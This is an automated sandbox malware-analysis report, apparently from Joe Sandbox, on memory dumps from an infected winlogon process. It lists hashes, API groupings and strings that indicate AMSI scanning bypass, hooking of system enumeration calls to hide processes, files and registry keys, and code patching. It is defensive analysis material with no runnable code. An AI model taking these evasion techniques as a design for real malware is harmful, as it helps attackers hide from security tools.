                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Value$Enumerate
                                                  • String ID:
                                                  • API String ID: 3520290360-0
                                                  • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                  • Instruction ID: ddcfc76e88451ae92f4f9cda427641abdeb8210533d5a923a24e23578d1e4606
                                                  • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                  • Instruction Fuzzy Hash: BF51C333B4570487F326CB15E460E9AB3A4FB84B89F904119AE4A43754EF3AC905CB83

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 223 1ca7d1e1e3c-1ca7d1e1e60 LoadLibraryA GetProcAddress 224 1ca7d1e1e62-1ca7d1e1e6d SleepEx 223->224 225 1ca7d1e1e6f-1ca7d1e1e73 223->225 224->224
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProcSleep
                                                  • String ID: AmsiScanBuffer$amsi.dll
                                                  • API String ID: 188063004-3248079830
                                                  • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                  • Instruction ID: 3f2b23ccba4f01efca1837d1ec0e5ebe98186c814f68ab41dbead1d3c470ee30
                                                  • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                  • Instruction Fuzzy Hash: FFD06272ED3708D5F90B6B51E8A4FD43262BF54B09FC50855C50E01264DE2EC659D3D3

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                  • String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                  • API String ID: 2135414181-3572789727
                                                  • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                  • Instruction ID: 16a9fbc9ca01aa2ad8d01d5c7c5c6cd5cef1b3026fde7233e4cf92ec2729da17
                                                  • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                  • Instruction Fuzzy Hash: A7711637A51B5986FB119F65E8A0AD833A5FF84B8DF811111DE4D43B28DE3AC584C392

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                                  • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                  • API String ID: 1735320900-4225371247
                                                  • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                  • Instruction ID: 28d763e4b3efa6897c284255733b152927e4241509441b1b3e99965525c9534b
                                                  • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                  • Instruction Fuzzy Hash: 115171B2E91B4EA5FB03DB64E860FD43322BF4074DFC00956A40942565EE7AC25AD3E3

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                                  • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                                  • API String ID: 740688525-1880043860
                                                  • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                  • Instruction ID: 75b8f92d8bfc56aebef74cbf69bbb5d49082de77f78bb49cf1e15368de41eb5e
                                                  • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                  • Instruction Fuzzy Hash: 91519C72B4170C51FA169B96A800BE57261BF48BB9FC847249E39473D4EF3AD505C783

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 151 1ca7d1e6270-1ca7d1e6297 152 1ca7d1e6299-1ca7d1e62a8 151->152 153 1ca7d1e62ab-1ca7d1e62b6 GetCurrentThreadId 151->153 152->153 154 1ca7d1e62b8-1ca7d1e62bd 153->154 155 1ca7d1e62c2-1ca7d1e62c9 153->155 156 1ca7d1e66ef-1ca7d1e6706 call 1ca7d1e8070 154->156 157 1ca7d1e62db-1ca7d1e62ef 155->157 158 1ca7d1e62cb-1ca7d1e62d6 call 1ca7d1e60a0 155->158 161 1ca7d1e62fe-1ca7d1e6304 157->161 158->156 164 1ca7d1e63d5-1ca7d1e63f6 161->164 165 1ca7d1e630a-1ca7d1e6313 161->165 169 1ca7d1e655f-1ca7d1e6570 call 1ca7d1e7bff 164->169 170 1ca7d1e63fc-1ca7d1e641c GetThreadContext 164->170 167 1ca7d1e6315-1ca7d1e6358 call 1ca7d1f3a40 165->167 168 1ca7d1e635a-1ca7d1e63cd call 1ca7d1e4c50 call 1ca7d1e4bf0 call 1ca7d1e4bb0 165->168 180 1ca7d1e63d0 167->180 168->180 185 1ca7d1e6575-1ca7d1e657b 169->185 173 1ca7d1e6422-1ca7d1e6443 170->173 174 1ca7d1e655a 170->174 173->174 184 1ca7d1e6449-1ca7d1e6452 173->184 174->169 180->161 187 1ca7d1e6454-1ca7d1e6465 184->187 188 1ca7d1e64d2-1ca7d1e64e3 184->188 189 1ca7d1e6581-1ca7d1e65d8 VirtualProtect FlushInstructionCache 185->189 190 1ca7d1e663e-1ca7d1e664e 185->190 196 1ca7d1e6467-1ca7d1e647c 187->196 197 1ca7d1e64cd 187->197 191 1ca7d1e6555 188->191 192 1ca7d1e64e5-1ca7d1e6503 188->192 198 1ca7d1e6609-1ca7d1e6639 call 1ca7d1e7fdc 189->198 199 1ca7d1e65da-1ca7d1e65e4 189->199 194 1ca7d1e6650-1ca7d1e6657 190->194 195 1ca7d1e665e-1ca7d1e666a call 1ca7d1e5530 190->195 192->191 200 1ca7d1e6505-1ca7d1e6550 call 1ca7d1e4040 call 1ca7d1e7c1d 192->200 194->195 202 1ca7d1e6659 call 1ca7d1e4b20 194->202 214 1ca7d1e666f-1ca7d1e6675 195->214 196->197 204 1ca7d1e647e-1ca7d1e64c8 call 1ca7d1e40b0 SetThreadContext 196->204 197->191 198->185 199->198 205 1ca7d1e65e6-1ca7d1e6601 call 1ca7d1e4ad0 199->205 200->191 202->195 204->197 205->198 217 1ca7d1e66b7-1ca7d1e66d5 214->217 218 1ca7d1e6677-1ca7d1e66b5 ResumeThread call 1ca7d1e7fdc 214->218 219 1ca7d1e66e9 217->219 220 1ca7d1e66d7-1ca7d1e66e6 217->220 218->214 219->156 220->219
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Thread$Current$Context
                                                  • String ID:
                                                  • API String ID: 1666949209-0
                                                  • Opcode ID: 62de8192582035d3c174f7317d52215c3d31caf77dd5d103fa0b8274126801a3
                                                  • Instruction ID: d05defe120a4688720ce9ecdd58902b16fb62d512cdd13eabecee864d7326d01
                                                  • Opcode Fuzzy Hash: 62de8192582035d3c174f7317d52215c3d31caf77dd5d103fa0b8274126801a3
                                                  • Instruction Fuzzy Hash: 1DD1CC37644B8C82FA71DB0AE49079A77A0F788B89F900512EACD47765DF3DC541CB82

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 226 1ca7d1e5810-1ca7d1e583c 227 1ca7d1e583e-1ca7d1e5846 226->227 228 1ca7d1e584d-1ca7d1e5856 226->228 227->228 229 1ca7d1e5858-1ca7d1e5860 228->229 230 1ca7d1e5867-1ca7d1e5870 228->230 229->230 231 1ca7d1e5872-1ca7d1e587a 230->231 232 1ca7d1e5881-1ca7d1e588a 230->232 231->232 233 1ca7d1e5896-1ca7d1e58a1 GetCurrentThreadId 232->233 234 1ca7d1e588c-1ca7d1e5891 232->234 236 1ca7d1e58a3-1ca7d1e58a8 233->236 237 1ca7d1e58ad-1ca7d1e58b4 233->237 235 1ca7d1e5e13-1ca7d1e5e1a 234->235 236->235 238 1ca7d1e58b6-1ca7d1e58bc 237->238 239 1ca7d1e58c1-1ca7d1e58ca 237->239 238->235 240 1ca7d1e58d6-1ca7d1e58e2 239->240 241 1ca7d1e58cc-1ca7d1e58d1 239->241 242 1ca7d1e58e4-1ca7d1e5909 240->242 243 1ca7d1e590e-1ca7d1e5965 call 1ca7d1e5e20 * 2 240->243 241->235 242->235 248 1ca7d1e5967-1ca7d1e596e 243->248 249 1ca7d1e597a-1ca7d1e5983 243->249 250 1ca7d1e5976 248->250 251 1ca7d1e5970 248->251 252 1ca7d1e5995-1ca7d1e599e 249->252 253 1ca7d1e5985-1ca7d1e5992 249->253 255 1ca7d1e59e6-1ca7d1e59ea 250->255 254 1ca7d1e59f0-1ca7d1e59f6 251->254 256 1ca7d1e59b3-1ca7d1e59d8 call 1ca7d1e7fa0 252->256 257 1ca7d1e59a0-1ca7d1e59b0 252->257 253->252 258 1ca7d1e59f8-1ca7d1e5a14 call 1ca7d1e4ad0 254->258 259 1ca7d1e5a25-1ca7d1e5a2b 254->259 255->254 265 1ca7d1e59de 256->265 266 1ca7d1e5a6d-1ca7d1e5a82 call 1ca7d1e4400 256->266 257->256 258->259 269 1ca7d1e5a16-1ca7d1e5a1e 258->269 263 1ca7d1e5a55-1ca7d1e5a68 259->263 264 1ca7d1e5a2d-1ca7d1e5a4c call 1ca7d1e7fdc 259->264 263->235 264->263 265->255 273 1ca7d1e5a84-1ca7d1e5a8c 266->273 274 1ca7d1e5a91-1ca7d1e5a9a 266->274 269->259 273->255 275 1ca7d1e5aac-1ca7d1e5afa call 1ca7d1f40e0 274->275 276 1ca7d1e5a9c-1ca7d1e5aa9 274->276 279 1ca7d1e5b02-1ca7d1e5b0a 275->279 276->275 280 1ca7d1e5c17-1ca7d1e5c1f 279->280 281 1ca7d1e5b10-1ca7d1e5bfb call 1ca7d1e7b80 279->281 282 1ca7d1e5c63-1ca7d1e5c6b 280->282 283 1ca7d1e5c21-1ca7d1e5c34 call 1ca7d1e4cd0 280->283 293 1ca7d1e5bff-1ca7d1e5c0e call 1ca7d1e47a0 281->293 294 1ca7d1e5bfd 281->294 286 1ca7d1e5c77-1ca7d1e5c86 282->286 287 1ca7d1e5c6d-1ca7d1e5c75 282->287 295 1ca7d1e5c38-1ca7d1e5c61 283->295 296 1ca7d1e5c36 283->296 291 1ca7d1e5c88 286->291 292 1ca7d1e5c8f 286->292 287->286 290 1ca7d1e5c94-1ca7d1e5ca1 287->290 298 1ca7d1e5ca4-1ca7d1e5cf9 call 1ca7d1f3a40 290->298 299 1ca7d1e5ca3 290->299 291->292 292->290 303 1ca7d1e5c12 293->303 304 1ca7d1e5c10 293->304 294->280 295->280 296->282 305 1ca7d1e5d08-1ca7d1e5da1 call 1ca7d1e4c50 call 1ca7d1e4bb0 VirtualProtect 298->305 306 1ca7d1e5cfb-1ca7d1e5d03 298->306 299->298 303->279 304->280 311 1ca7d1e5da3-1ca7d1e5da8 GetLastError 305->311 312 1ca7d1e5db1-1ca7d1e5e11 305->312 311->312 312->235
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: 4460526132078707f03e529f17315c9f8621164f7a74e4fe9c23d362e9fa087d
                                                  • Instruction ID: c4fb3315ca78ad6c88cc819d43d3822fc1bb5b5b3bb77f142309b4c7efaf3f70
                                                  • Opcode Fuzzy Hash: 4460526132078707f03e529f17315c9f8621164f7a74e4fe9c23d362e9fa087d
                                                  • Instruction Fuzzy Hash: A802F933659B8886F761CB15F49079AB7A0F7C4799F500015EA8E87BA8DF7DC484CB42

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModule
                                                  • String ID:
                                                  • API String ID: 1092925422-0
                                                  • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                  • Instruction ID: 4b0ed5361dff3adcda6195a5dc2af1083a8005ab2c1b804d84ff7dccd2579ba4
                                                  • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                  • Instruction Fuzzy Hash: 72115E37A5574493FB268B61E404A9AB7B0FB44B89F440026DA4D43798EF7EC954C7C3
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000003.1645690785.000001CA7D1B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_3_1ca7d1b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Virtual$Protect$AllocLibraryLoad
                                                  • String ID:
                                                  • API String ID: 3316853933-0
                                                  • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                  • Instruction ID: fab056db1c559ce614da3632ff79b2cd998d8c65ade00f4a8a9fe06968449f78
                                                  • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                  • Instruction Fuzzy Hash: B291F5B3F4139887EB558F29D400FA9B395FF55B98F9481249E4D07B88DA36D822C742

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Virtual$AllocQuery
                                                  • String ID:
                                                  • API String ID: 31662377-0
                                                  • Opcode ID: a8802b86f0811ea88e9113a3d60b8cb8649c82089feb35d3c44dd7bdfe1e6621
                                                  • Instruction ID: 31ae54dde4bc601838691571fe20e4d19e02a82357ab131b83e5d70d6c66b96e
                                                  • Opcode Fuzzy Hash: a8802b86f0811ea88e9113a3d60b8cb8649c82089feb35d3c44dd7bdfe1e6621
                                                  • Instruction Fuzzy Hash: BD317533A55B4981FA32CB65F050B8A72A4F78878DF900535E5CD46B94DF3EC1408B83

                                                  Control-flow Graph

                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32 ref: 000001CA7D1E3A35
                                                  • PathFindFileNameW.SHLWAPI ref: 000001CA7D1E3A44
                                                    • Part of subcall function 000001CA7D1E3F88: StrCmpNIW.SHLWAPI(?,?,?,000001CA7D1E272F), ref: 000001CA7D1E3FA0
                                                    • Part of subcall function 000001CA7D1E3EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3EDB
                                                    • Part of subcall function 000001CA7D1E3EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3F0E
                                                    • Part of subcall function 000001CA7D1E3EC8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3F2E
                                                    • Part of subcall function 000001CA7D1E3EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3F47
                                                    • Part of subcall function 000001CA7D1E3EC8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3F68
                                                  • CreateThread.KERNELBASE ref: 000001CA7D1E3A8B
                                                    • Part of subcall function 000001CA7D1E1E74: GetCurrentThread.KERNEL32 ref: 000001CA7D1E1E7F
                                                    • Part of subcall function 000001CA7D1E1E74: CreateThread.KERNELBASE ref: 000001CA7D1E2043
                                                    • Part of subcall function 000001CA7D1E1E74: TlsAlloc.KERNEL32 ref: 000001CA7D1E2049
                                                    • Part of subcall function 000001CA7D1E1E74: TlsAlloc.KERNEL32 ref: 000001CA7D1E2055
                                                    • Part of subcall function 000001CA7D1E1E74: TlsAlloc.KERNEL32 ref: 000001CA7D1E2061
                                                    • Part of subcall function 000001CA7D1E1E74: TlsAlloc.KERNEL32 ref: 000001CA7D1E206D
                                                    • Part of subcall function 000001CA7D1E1E74: TlsAlloc.KERNEL32 ref: 000001CA7D1E2079
                                                    • Part of subcall function 000001CA7D1E1E74: TlsAlloc.KERNEL32 ref: 000001CA7D1E2085
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
                                                  • String ID:
                                                  • API String ID: 2779030803-0
                                                  • Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                                  • Instruction ID: 5a3ca2a828a2f69e8ddffaa21c5641dcb192bd3c096c6af3b0a23b43865aa00f
                                                  • Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                                  • Instruction Fuzzy Hash: FD116937E9070982FB66A722A549FE932A0BF84B4FFC000199406C11D0EF3BC58587D3

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                  • String ID:
                                                  • API String ID: 3733156554-0
                                                  • Opcode ID: 50caac35bfbc2d5f59ac81492b3b3ec34dc9555305fb9744858cadce20ffe8b5
                                                  • Instruction ID: d66c06046afa48536f3f5d6c761f082350603e171004f0d7298866914a91c0bf
                                                  • Opcode Fuzzy Hash: 50caac35bfbc2d5f59ac81492b3b3ec34dc9555305fb9744858cadce20ffe8b5
                                                  • Instruction Fuzzy Hash: BAF01237658B4880F6319B05E451B8A77A1FB887D9F544111BACD07769CA3AC580CB82

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 000001CA7D1E1724: GetProcessHeap.KERNEL32 ref: 000001CA7D1E172F
                                                    • Part of subcall function 000001CA7D1E1724: HeapAlloc.KERNEL32 ref: 000001CA7D1E173E
                                                    • Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E17AE
                                                    • Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E17DB
                                                    • Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E17F5
                                                    • Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E1815
                                                    • Part of subcall function 000001CA7D1E1724: RegCloseKey.KERNELBASE ref: 000001CA7D1E1830
                                                    • Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E1850
                                                    • Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E186B
                                                    • Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E188B
                                                    • Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E18A6
                                                    • Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E18C6
                                                  • SleepEx.KERNELBASE ref: 000001CA7D1E1BDF
                                                    • Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E18E1
                                                    • Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E1901
                                                    • Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E191C
                                                    • Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E193C
                                                    • Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E1957
                                                    • Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E1977
                                                    • Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E1992
                                                    • Part of subcall function 000001CA7D1E1724: RegCloseKey.KERNELBASE ref: 000001CA7D1E199C
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
